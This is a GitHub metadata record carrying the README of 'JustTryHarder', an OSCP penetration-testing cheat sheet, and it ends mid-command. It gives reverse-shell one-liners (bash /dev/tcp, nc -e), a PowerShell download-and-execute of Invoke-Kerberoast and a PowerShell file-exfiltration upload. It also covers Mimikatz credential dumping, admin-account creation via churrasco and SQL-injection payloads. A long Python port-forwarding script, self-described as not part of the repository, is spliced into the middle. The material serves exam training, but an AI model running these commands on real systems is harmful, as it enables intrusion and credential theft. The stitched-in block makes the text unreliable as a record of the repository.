{"id":13842902,"url":"https://github.com/sinfulz/JustTryHarder","last_synced_at":"2025-07-11T17:32:22.106Z","repository":{"id":40584807,"uuid":"186368869","full_name":"sinfulz/JustTryHarder","owner":"sinfulz","description":"JustTryHarder, a cheat sheet which will aid you through the PWK course \u0026 the OSCP Exam. (Inspired by PayloadAllTheThings)","archived":false,"fork":false,"pushed_at":"2023-02-08T06:01:37.000Z","size":185,"stargazers_count":785,"open_issues_count":0,"forks_count":105,"subscribers_count":33,"default_branch":"master","last_synced_at":"2024-08-05T17:34:19.827Z","etag":null,"topics":["hacktoberfest","hacktoberfest-accepted","oscp","penetration","penetration-test","penetration-test-framework","penetration-testing","penetration-testing-tools","penetration-tests","pentest","pentest-environment","pentest-scripts","pentest-tool","pentest-tools","pentesters","pentesting","pentesting-networks","pentesting-tools","pentesting-windows","testing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sinfulz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"custom":null}},"created_at":"2019-05-13T07:36:18.000Z","updated_at":"2024-07-27T01:31:22.000Z","dependencies_parsed_at":"2024-01-08T08:56:39.710Z","dependency_job_id":null,"html_url":"https://github.com/sinfulz/JustTryHarder","commit_stats":null,"previous_names":[],"tags_count":0,"template":true,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/
GitHub/repositories/sinfulz%2FJustTryHarder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sinfulz","download_url":"https://codeload.github.com/sinfulz/JustTryHarder/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745348,"owners_count":17517628,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacktoberfest","hacktoberfest-accepted","oscp","penetration","penetration-test","penetration-test-framework","penetration-testing","penetration-testing-tools","penetration-tests","pentest","pentest-environment","pentest-scripts","pentest-tool","pentest-tools","pentesters","pentesting","pentesting-networks","pentesting-tools","pentesting-windows","testing"],"created_at":"2024-08-04T17:01:50.292Z","updated_at":"2024-11-21T14:30:28.264Z","avatar_url":"https://github.com/sinfulz.png","language":"Python","readme":"# JustTryHarder\n\nJustTryHarder, a cheat sheet which will aid you through the PWK course \u0026 the OSCP Exam.\n\n(Inspired by PayloadAllTheThings)\n\nFeel free to submit a Pull Request \u0026 leave a star to share some love if this helped you. 💖\n\n**Hacktoberfest friendly!**\nYes, we are open to Pull Requests for Hacktoberfest! 
Please ensure it's not spam and actually contributes well to this repo. Thanks \u0026 happy hacking!\n\nDisclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.\n\nCredit Info:\nI have obtained a lot of this info through other GitHub repos, blogs, sites and more.\nI have tried to give as much credit to the original creator as possible; if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz\n\n## Determining the OS of a host via Ping\n\n---\n\n```\nping 10.10.10.110\nPING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.\n64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms\n```\n\nThe `TTL` in the reply is a rough OS fingerprint: each OS family starts from a fixed initial TTL and every router on the path decrements it by one, so the observed value gives you both the family and the hop count. The three common initial values are:\n\n-   TTL=64 = *nix (Linux, BSD, macOS) - if you're getting 61 then there are 3 hops and it's a *nix device, most likely Linux.\n-   TTL=128 = Windows - if the TTL is 127 then there is 1 hop and it's a Windows box.\n-   TTL=255 = Solaris and most network gear (Cisco IOS and the like) - if the TTL is 251 then there are 4 hops and it's probably Solaris or a router/switch.\n\nTreat this as a hint, not proof: the initial TTL is a tunable kernel setting, and a load balancer or proxy in front of the host answers with its own TTL.\n\n## BOF (WIP)\n\n---\n\n(Typical bad characters include: 0x00, 0x0A, 0x0D)\n\n-   Fuzzing\n-   Finding EIP position\n-   Finding bad chars\n-   Locating jmp esp\n-   Generating payload with msfvenom\n-   Getting reverse shell with netcat\n\nGood BOF resources:\n\n-   https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/\n-   https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/\n-   https://github.com/justinsteven/dostackbufferoverflowgood\n-   https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/\n\n## Breakouts / Environment Escapes\n\n---\n\n-   https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/\n-   https://sra.io/blog/sitekiosk-breakout/\n-   https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/\n-   
https://cognosec.com/breaking-out-of-citrix-environment/\n-   https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/\n-   https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf\n-   https://gracefulsecurity.com/citrix-breakout/\n\n## DNS - Zone Transfers\n\n---\n\n-   host -t axfr HTB.local 10.10.10.10\n-   host -l HTB.local 10.10.10.10\n-   host -l \u003cdomain name\u003e \u003cname server\u003e\n-   dig @\u003cdns server\u003e \u003cdomain\u003e axfr\n\nA transfer only succeeds when the server is misconfigured to allow AXFR from anyone; `Transfer failed.` is the expected answer from a properly restricted zone.\n\n## File Transfers\n\n---\n\n### SMB Transfer\n\nOn the Victim machine (Windows), after serving `myshare` from Kali with Impacket's `smbserver.py` (see SMB - Impacket below):\n\n```\nnet use x: \\\\10.10.10.10\\myshare\ncopy whatever.zip x:\n```\n\n(`net share` would create a share on the victim itself; `net use` is what maps the remote one. Modern Windows refuses guest SMB access by default, so start `smbserver.py` with `-smb2support` and a `-username`/`-password` if the mapping fails.)\n\n### Wget Transfer\n\nHow to retrieve file(s) from host (inside a reverse shell)\n\n```bash\n# Place file you want transferred in /var/www/html/\nservice apache2 start\n# Run on the remote server\nwget http://10.10.10.10/pspy64          # single file\nwget -r http://10.10.10.10/folder/      # whole folder (recursive)\n```\n\n### TFTP Transfer\n\n(How to transfer from Kali to Windows)\n\nUsing MSF.\n\nStart MSF before these steps:\n\nInside MSF\n\n1. `use auxiliary/server/tftp`\n2. `set TFTPROOT /usr/share/mimikatz/Win32/`\n3. `run`\n\nInside a terminal on the Windows host\n\n4. `tftp -i 10.10.10.10 GET mimikatz.exe`\n\n(The Windows TFTP client is an optional feature since Vista and is usually absent on modern hosts; check with `where tftp` before relying on it.)\n\n### NetCat (Windows to Kali)\n\n1. Linux (start the listener first): `nc -nlvp 4444 \u003e bank-account.zip`\n\n2. Windows: `nc -nv 10.11.0.61 4444 \u003c bank-account.zip`\n\n### PowerShell\n\n```ps\nInvoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\\Users\\Victim\\exploit.py\n```\n\nWithout an interactive powershell session:\n\n```ps\n# Create wget.ps1, then run it with: powershell -ExecutionPolicy Bypass -File wget.ps1\n$url = \"http://10.10.10.10/file.txt\"\n$path = \"C:\\path\\to\\save\\file.txt\"\n$client = New-Object System.Net.WebClient\n$client.DownloadFile($url, $path)\n```\n\n### Base64 (Linux -\u003e Linux)\n\nLocal Host:\n\n1. `base64 -w0 /path/to/exploit.py \u003e encoded.b64` (`-w0` disables line wrapping so the blob pastes as a single line)\n2. 
Transfer `encoded.b64` to the remote server via `nc` or otherwise.\n\nRemote Server - Linux:\n\n3. `base64 -d /path/to/encoded.b64 \u003e exploit.py`\n\nRemote Server - PowerShell / Windows:\n\n3. `certutil -decode encoded.b64 exploit.py` (see Certutil below)\n\n### Certutil\n\n```\ncertutil.exe -urlcache -split -f \"http://ip.for.kali.box/file-to-get.zip\" name-to-save-as.zip\n```\n\n### HTTP File Upload (Exfiltration)\n\nUpload:\n\n1. Create upload.php file in attacking machine webroot, `/var/www/html` by default.\n\n```php\n\u003c?php\n$uploaddir = '/var/www/uploads/';\n\n// basename() stops a traversal in the client-supplied filename from writing outside $uploaddir\n$uploadfile = $uploaddir . basename($_FILES['file']['name']);\n\nmove_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);\n?\u003e\n```\n\n2. Create upload directory and set appropriate permissions to allow upload.\n\n```bash\nsudo mkdir /var/www/uploads \u0026\u0026 sudo chown www-data:www-data /var/www/uploads\n```\n\n3. Upload file from victim machine to attacking machine using PowerShell:\n\n```ps\npowershell.exe -exec bypass -noprofile -Command \"(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')\"\n```\n\n## Kerberoasting\n\n-   `GetUserSPNs.py -request -dc-ip \u003cDC_IP\u003e \u003cdomain\u003e/\u003cuser\u003e:\u003cpassword\u003e` (any domain account can request TGS tickets for SPN-bearing accounts; crack the output with `hashcat -m 13100`)\n\n-   `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`\n\n-   `impacket-secretsdump -just-dc-ntlm \u003cDOMAIN\u003e/\u003cUSER\u003e@\u003cDOMAIN_CONTROLLER\u003e -outputfile filename.hashes` (this is DCSync rather than Kerberoasting: it needs replication rights, normally Domain Admin, and dumps every NTLM hash in the domain)\n\n## LFI / RFI\n\nPHP Reverse Shell:\n\n```php\n\u003c?php exec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10.10/1234 0\u003e\u00261'\"); ?\u003e\n```\n\nCommand Injection:\n\n```php\n\u003c?php echo shell_exec('whoami'); ?\u003e\n```\n\n-   For more on LFI \u0026 RFI see the relevant sections of PayloadsAllTheThings (linked under Payload Generation below).\n\n## MSSQL / SQLi\n\n-   `xp_cmdshell` is disabled by default; enable it first (needs sysadmin): `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`\n-   EXEC master..xp_cmdshell 'whoami';\n-   meh' exec master..xp_cmdshell 
'whoami' --\n-   https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md\n-   http://pentestmonkey.net/category/cheat-sheet/sql-injection\n\n## Password Cracking\n\nHashcat\n\n-   `hashcat -m 500 -a 0 -o cracked_password.txt hash.txt /path/to/your/wordlist.txt` (`-m 500` is md5crypt / `$1$`; find the right mode with `hashcat --example-hashes`; avoid `--force`, it only silences driver warnings and can hide broken results)\n\nJohn The Ripper\n\n-   `john --rules --wordlist=/path/to/your/wordlist.txt hash.txt`\n\n## Password Spraying (CrackMapExec)\n\n-   `cme smb 10.10.10.10 -u username -d domain -p password` (single credential check)\n-   `cme smb 10.10.10.10 -u users.txt -p '\u003cpassword\u003e' -d domain --continue-on-success` (one password against a user list; mind the domain lockout threshold)\n\n## Payload Generation\n\n-   [NETSEC - Creating Payloads](https://netsec.ws/?p=331)\n-   [MsfVenom Cheatsheet](http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)\n-   [Metasploit Unleashed Payloads](https://www.offensive-security.com/metasploit-unleashed/payloads/)\n-   [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n-   Non-staged payloads (e.g. `shell_reverse_tcp`) can be caught with a plain netcat listener\n-   Staged payloads (e.g. `shell/reverse_tcp`) need `multi/handler` to deliver the second stage\n\n## PHP\n\n-   [The differences between `exec()`, `shell_exec`, `system()` and `passthru()`](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)\n\n## Priv Esc - Linux\n\nIf gcc and wget are installed, compiling and running a kernel exploit on the box is practical (check `uname -a` and the suggesters below first; a wrong kernel exploit can crash the target).\n\n-   [Linux Kernel Exploits](https://github.com/SecWiki/linux-kernel-exploits)\n-   [GTFObins - Break ~~the f\\*\\*k~~ out of restricted shells](https://gtfobins.github.io)\n    -   GTFO Helper script: https://github.com/dreadnaughtsec/gtfo\n-   [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)\n-   [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)\n-   [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n-   `grep -Ri 'password' .`\n-   `find / -perm -4000 2\u003e/dev/null`\n-   `find / -perm -u=s 2\u003e/dev/null`\n-   `find / -user root -perm -4000 -exec ls -ldb {} \\;`\n-   `which awk perl python ruby gcc cc vi vim nmap find netcat 
nc wget tftp ftp 2\u003e/dev/null`\n    (then `ls -la` each hit; a world-writable (777) interpreter or tool that root runs can simply be replaced).\n-   Custom SUID binary. Requires code execution as the target user (to own and chmod the file). Example: mysql sys_eval as root.\n\n```c\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003csys/types.h\u003e\n\n/* build as the target user: gcc suid.c -o suid \u0026\u0026 chmod u+s suid */\nint main(void) {\n    /* the SUID bit only raises the effective uid; copy it to the real uid so bash does not drop it */\n    setuid(geteuid());\n    system(\"/bin/bash\");\n    return 0;\n}\n```\n\n## Priv Esc - Windows\n\n-   [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)\n-   [Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)\n-   [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)\n-   [Powerless - Enumeration Tool](https://github.com/M4ximuss/Powerless)\n-   [Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop)\n-   [Just Another Windows (Enum) Script / JAWS](https://github.com/411Hall/JAWS)\n-   [Watson](https://github.com/rasta-mouse/Watson)\n-   [Sherlock](https://github.com/rasta-mouse/Sherlock) (Deprecated)\n-   [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)\n-   `churrasco -d \"net user /add \u003cusername\u003e \u003cpassword\u003e\"`\n-   `churrasco -d \"net localgroup administrators \u003cusername\u003e /add\"`\n-   `churrasco -d \"NET LOCALGROUP \"Remote Desktop Users\" \u003cusername\u003e /ADD\"`\n\n## Post Exploitation\n\n1. Mimikatz.exe (run it from an elevated prompt; `privilege::debug` needs SeDebugPrivilege)\n2. privilege::debug\n3. sekurlsa::logonpasswords\n\n## Port Forwarding\n\n-   Local (`ssh -L LPORT:TARGET:TPORT pivot`) -- forward a local port to a host reachable from the remote (pivot) machine.\n-   Remote (`ssh -R RPORT:TARGET:TPORT pivot`) -- forward a port on the remote machine back to a host reachable from your local machine.\n-   Dynamic (`ssh -D LPORT pivot`) -- open a SOCKS proxy locally; the destination is chosen per connection.\n\nUse local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine. 
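The local-forward case above, as an added example that is not part of this repository: a minimal TCP relay in Python that does at socket level what `ssh -L LPORT:TARGET:TPORT pivot` does, so you can see why the tunnelled service then answers on 127.0.0.1. The echo service is a constructed stand-in for "a service reachable only from the pivot"; everything stays on loopback and the ports are ephemeral. All names here are hypothetical, nothing is the project's own tooling.

```python
"""Minimal TCP port-forwarder: what `ssh -L LPORT:TARGET:TPORT pivot` does at the socket level."""
import socket
import threading
from typing import Tuple


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the peer sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(a: socket.socket, b: socket.socket) -> None:
    """Run both directions of one forwarded connection, then close both ends."""
    threads = [threading.Thread(target=_pump, args=(a, b), daemon=True),
               threading.Thread(target=_pump, args=(b, a), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def start_forwarder(bind_host: str, bind_port: int,
                    target_host: str, target_port: int) -> Tuple[socket.socket, int]:
    """Listen on bind_host:bind_port and relay each accepted connection to target_host:target_port.

    Returns the listening socket (close it to stop) and the port actually bound (bind_port=0 picks one).
    Bound to loopback this is a local (-L) forward; run on the pivot and bound to an outward-facing
    address it is what a remote (-R) forward gives you.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_host, bind_port))
    listener.listen(16)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = listener.accept()
            except OSError:  # listener closed: shut down
                return
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:  # target unreachable: drop the client, as ssh would
                client.close()
                continue
            threading.Thread(target=_relay, args=(client, upstream), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener, listener.getsockname()[1]


def start_echo_service() -> Tuple[socket.socket, int]:
    """Constructed stand-in for the service only reachable from the pivot: answers b'echo:' + request."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"echo:" + conn.recv(4096))

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def through_tunnel(payload: bytes) -> bytes:
    """Stand up service and forwarder on loopback, talk to the service via the forwarded port, return the reply."""
    svc, svc_port = start_echo_service()
    fwd, fwd_port = start_forwarder("127.0.0.1", 0, "127.0.0.1", svc_port)
    try:
        with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # our EOF travels through the relay just like the data
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
        return reply
    finally:
        fwd.close()
        svc.close()


if __name__ == "__main__":
    print(through_tunnel(b"GET / HTTP/1.0\r\n\r\n"))
```

The same relay bound to an outward-facing address on the pivot is a remote (`-R`) forward; a dynamic (`-D`) forward differs only in that the destination is read from a SOCKS handshake on each new connection instead of being fixed at start-up. Without SSH around it the bytes cross the wire in the clear, which is why the SSH variants below are preferred over a bare relay.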
Once the tunnel is up the service answers on your own loopback address (127.0.0.1:LPORT).\n\nUse remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into (bound to that machine's loopback unless its sshd has `GatewayPorts yes`).\n\nDynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with software that speaks SOCKS, or wrap anything else with proxychains.\n\nChisel\nlocal system:\n\n```\n./chisel server -p 8080 --reverse\n```\n\nvictim:\n\n```\n./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234\n```\n\n(`R:1234:127.0.0.1:1234` is a reverse forward: port 1234 on your machine now reaches 127.0.0.1:1234 on the victim. `R:socks` gives you a reverse SOCKS proxy instead.)\n\nPlink\n\n-   WIP\n\nSSH\n\n1. Generate an SSH key pair on the box being pivoted through, so you never type your Kali credentials on the compromised host.\n\n```\nssh-keygen\ncat ~/.ssh/id_rsa.pub\n```\n\n2. Copy the public key output from the above command. Add this value and the pivot machine's IP address to the `~/.ssh/authorized_keys` file on your attacking (Kali) machine using the syntax below. If you do not already have this file, simply create a new file and add the contents below. The options restrict that key to forwarding only, so the pivot cannot get a shell on Kali with it.\n\n```\nfrom=\"[VICTIM_MACHINE_IP_ADDRESS]\",command=\"echo 'This account can only be used for port forwarding'\",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]\n```\n\n3. Ensure the SSH service is running on your attacking (Kali) machine.\n\n```\nsudo service ssh start\n```\n\n4. Initiate SSH call from the box being pivoted through and specify the `id_rsa` private key generated in step 1. This private key may be called something else if you changed the name when generating. Ensure the username and IP address of your attacking machine are correct. `-R 1080` with no destination is a reverse dynamic (SOCKS) forward and needs OpenSSH 7.6 or newer on both ends.\n\n```\nssh -f -N -R 1080 -o \"UserKnownHostsFile=/dev/null\" -o \"StrictHostKeyChecking=no\" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]\n```\n\n5. Edit your `/etc/proxychains.conf` file to add the line below.\n\n```\nsocks4 127.0.0.1 1080\n```\n\n6. 
Prepend `proxychains` to pivot through the compromised host. When scanning with `nmap`, use TCP connect scans (`-sT`) together with `-Pn -n`: SOCKS only carries complete TCP connections, so raw SYN scans, ICMP host discovery and DNS lookups cannot go through the proxy, e.g.\n\n```\nsudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10\n```\n\nAdditional Notes:\n\n-   ssh user@10.10.10.10 -R 1234:127.0.0.1:1234\n-   ssh -D 1337 -q -C -N -f user@10.10.10.10 (https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters)\n\n## Socks Proxy (using PowerShell)\n\nOn the Windows pivot:\n\n-   Import-Module .\\Invoke-SocksProxy.psm1\n-   Invoke-SocksProxy -bindPort 9080\n\nOn Kali:\n\n-   vi /etc/proxychains.conf\n-   socks5 \u003cpivot ip\u003e 9080\n-   proxychains nmap -sT -Pn -n \u003cip\u003e\n\n## Port Scanning\n\nTCP\n\n-   reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames\n-   nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10\n-   nmap -sT -p 22,80,110 -A\n-   nmap -p- -iL ips.txt \u003e AllTCPPorts.txt\n-   nc -v -n -z -w1 10.10.10.10 1-10000\n\nUDP (can take hours; if you already have a shell on the box, `netstat -tulpn` / `ss -ulpn` on the host is faster and exact)\n\n-   nmap -sU --top-ports 10000\n-   nmap -sT -sU -p 22,80,110 -A\n-   nmap -sT -sU -p- --min-rate 2000\n-   nmap -p- -sU -iL ips.txt \u003e udp.txt\n-   nmap -sU -sV -iL ips.txt \u003e alludpports.txt\n\nSNMP\nnmap -p161 -sU -sV -iL ips.txt \u003e snmp.txt\n\nSSH\nnmap --script ssh2-enum-algos -iL ips.txt \u003e SSH.txt\n\nSSL\nnmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt \u003e SSLScan.txt\n\nNMAP Bootstrap Report (the stylesheet is applied to the XML output, not opened on its own)\nnmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10\nxsltproc -o poison.html nmap-bootstrap.xsl poison.xml\nfirefox poison.html\n\n## Ping Sweep\n\n# Linux (basic one liners)\n\n-   for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep \"bytes from\" \u0026) ;done\n-   fping -g 192.168.0.1/24\n\n# Linux (script)\n\n```\nfor i in `seq 1 255`\ndo\n    ping -c1 -W1 192.168.125.$i 2\u003e/dev/null 1\u003e\u00262\n    if [[ $? 
-eq 0 ]]\n    then\n        echo 192.168.125.$i is up\n    fi\ndone\n```\n\n# Windows (cmd)\n\n-   for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i \u003e nul \u0026\u0026 echo 192.168.1.%i is up.\n\n# Windows (PowerShell)\n\n-   $ping = New-Object System.Net.NetworkInformation.Ping ; 1..254 | % { $ping.Send(\"10.9.15.$_\", 100) | where Status -ne 'TimedOut' | select Address | fl * }\n\n# Nmap\n\n-   nmap -sn 192.168.0.1-254 (`-sP` is the old, deprecated spelling of `-sn`)\n\n## Pivoting\n\n-   sshuttle -r user@10.10.10.10 10.1.1.0/24\n\n## Remote Desktop\n\n-   rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/\n-   xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore\n\n## Responder\n\n-   responder -I tun0 -wrF\n-   https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html\n-   https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\n\n## Reverse Shells\n\nLinux\n\n-   http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n-   https://awansec.com/reverse-shell.html\n-   https://www.revshells.com/\n\nWindows\n\n-   https://github.com/Dhayalanb/windows-php-reverse-shell\n-   nc 10.10.10.10 4444 -e cmd.exe\n-   https://www.revshells.com/\n\n## SQL Injection (SQLmap)\n\n-   sqlmap -u \"http://example.com/test.php?test=test\" --level=5 --risk=3 --batch (`--risk=3` adds OR-based and heavy time-based payloads that can modify or lock data; stay at the default risk on targets you must not damage)\n\n## Shell Upgrading\n\nSource: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ \u0026 https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell\n\n#### Python\n\nSpawn a PTY first with `python -c 'import pty; pty.spawn(\"/bin/bash\")'` (or `python3 -c ...`), then fix the terminal:\n\n```\n- In reverse shell\n\n1. python -c 'import pty; pty.spawn(\"/bin/bash\")'\n2. Ctrl-Z\n\n- In Kali (type 3 and 4 on one line, `stty raw -echo; fg`, so fg runs straight away; `stty -a` shows your rows/columns)\n\n3. stty raw -echo\n4. fg\n\n- In reverse shell\n5. reset (sometimes optional)\n6. export SHELL=bash\n7. export TERM=xterm-256color\n8. 
stty rows \u003cnum\u003e columns \u003ccols\u003e (optional)\n(Sometimes the command will need to be executed: export TERM=xterm)\n```\n\nUsing socat\n\n```\n#Listener (Kali):\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n```\n\n#### Perl\n\n1. perl -e 'exec \"/bin/sh\";'\n2. perl: exec \"/bin/sh\";\n\n#### Bash\n\n/bin/sh -i\n\n## Show listening ports\n\n-   Linux netstat syntax (`ss -tulpn` is the modern equivalent)\n\n    1.  netstat -tulpn | grep LISTEN\n\n-   FreeBSD/MacOS X netstat syntax (UDP sockets have no LISTEN state, so do not grep for it on the udp output)\n    1.  netstat -anp tcp | grep LISTEN\n    2.  netstat -anp udp\n-   OpenBSD netstat syntax\n\n    1.  netstat -na -f inet | grep LISTEN\n    2.  netstat -nat | grep LISTEN\n\n-   Nmap scan syntax\n    1.  sudo nmap -sT -O localhost\n    2.  sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##\n    3.  sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##\n\n## SMB - Enumeration\n\n-   https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html\n-   smbmap -H 10.10.10.10\n-   smbclient -L 10.0.0.10\n-   smbclient //10.10.10.10/share$\n\n## SMB - Impacket\n\n-   Impacket's PSEXEC (After creating a remote port fwd)\n    /usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10\n\nPassword: (password)\n\n[*] Trying protocol 445/SMB...\n\n-   Impacket's SMBServer (For File Transfer)\n\n1. cd /usr/share/windows-binaries\n2. python /usr/share/doc/python-impacket/examples/smbserver.py a .\n3. \\\\\\10.10.10.10\\a\\mimikatz.exe\n\n## SMTP Enumeration\n\nhttps://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt\n\n## ICMP Injection\n\nBlind command-injection check: inject a ping to your own box (`ping -n 3` on Windows, `ping -c 3` on Linux) and watch for the echo requests arriving.\n\n1. ping -n 3 10.10.10.10\n2. 
tcpdump -i tun0 icmp\n\n## VMware (not going full screen)\n\n`systemctl restart open-vm-tools.service`\n\n## Web Servers:\n\n-   python -m SimpleHTTPServer 80\n-   python3 -m http.server 80\n-   ngrok http \"file:///C:\\Users\\sinfulz\\Public Folder\"\n-   php -S 0.0.0.0:80\n\n## Web Scanning:\n\nWeb Scanning with extensions\n\ngobuster, Linux target (web server is probably Apache)\n`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401 -b \"\"`\n\ngobuster, Windows target (web server is probably IIS)\n\n`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401 -b \"\"`\n\n(gobuster 3.1+ refuses `-s` together with its default 404 blacklist, hence the empty `-b \"\"`.)\n\ndirsearch, Linux target\n\n`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50`\n\ndirsearch, Windows target\n\n`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 